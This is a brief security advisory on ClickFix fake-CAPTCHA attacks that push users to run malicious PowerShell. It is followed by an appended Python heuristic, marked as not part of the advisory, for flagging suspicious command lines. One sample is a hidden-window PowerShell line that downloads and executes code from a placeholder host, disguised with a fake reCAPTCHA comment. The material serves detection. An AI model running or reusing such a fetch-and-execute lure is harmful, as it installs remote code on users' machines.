Fake CAPTCHAs that initiate malware and harvest data
Published on 30 September 2025
The Caribbean Community (CARICOM) Implementation Agency for Crime and Security (IMPACS) is warning about a new fraud method that uses fake CAPTCHAs (Completely Automated Public Turing tests to tell Computers and Humans Apart) and social engineering to trick users into installing malware.
The fake CAPTCHAs work by embedding malicious code or prompts into seemingly legitimate websites or pop-up warnings. These attacks, known as ClickFix, exploit users' tendency to quickly complete verification processes, leading them to execute malicious PowerShell or other scripts that download infostealers and remote access trojans (RATs) onto their devices.
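Added example, not part of the IMPACS advisory: a heuristic triage of command strings (for example, taken from process-creation logs) for the pattern described above, a script interpreter launched with a remote fetch and stealth options, or with CAPTCHA-style lure text attached. The signal patterns, the `assess` function and the sample commands are constructed assumptions, not indicators published by IMPACS.

```python
import re

# Heuristic signals. These patterns are assumptions chosen for this example,
# not indicators from the advisory; tune them against your own telemetry.
SIGNALS = {
    # A script interpreter is being launched.
    "interpreter": re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript)(\.exe)?\b", re.I),
    # The command references a remote location.
    "remote_fetch": re.compile(r"https?://", re.I),
    # Hidden window or encoded command options.
    "stealth_flag": re.compile(r"-w(indowstyle)?\s+(h|hidden)\b|-enc(odedcommand)?\b", re.I),
    # Text that mimics a verification step, often appended as a comment
    # so the user sees something reassuring in the command they paste.
    "captcha_lure": re.compile(r"not a robot|captcha|verify you are human|verification id", re.I),
}


def assess(command: str) -> dict:
    """Return the signals found in a command string and a verdict."""
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(command))
    suspicious = "interpreter" in hits and (
        "captcha_lure" in hits or {"remote_fetch", "stealth_flag"} <= set(hits)
    )
    return {"suspicious": suspicious, "signals": hits}


# Constructed sample command lines (not real incident data).
SAMPLES = [
    'powershell -w hidden -c "iex (irm https://example.invalid/v)" '
    "# I am not a robot - reCAPTCHA Verification ID: 4821",
    r"powershell -NoProfile -File C:\Scripts\backup.ps1",
    "ping 10.0.0.1",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        result = assess(cmd)
        verdict = "REVIEW" if result["suspicious"] else "ok"
        print(f"{verdict:6} {result['signals']} :: {cmd[:60]}")
```

A match is a prompt for analyst review rather than proof of compromise, since administrators also run remote scripts with hidden windows.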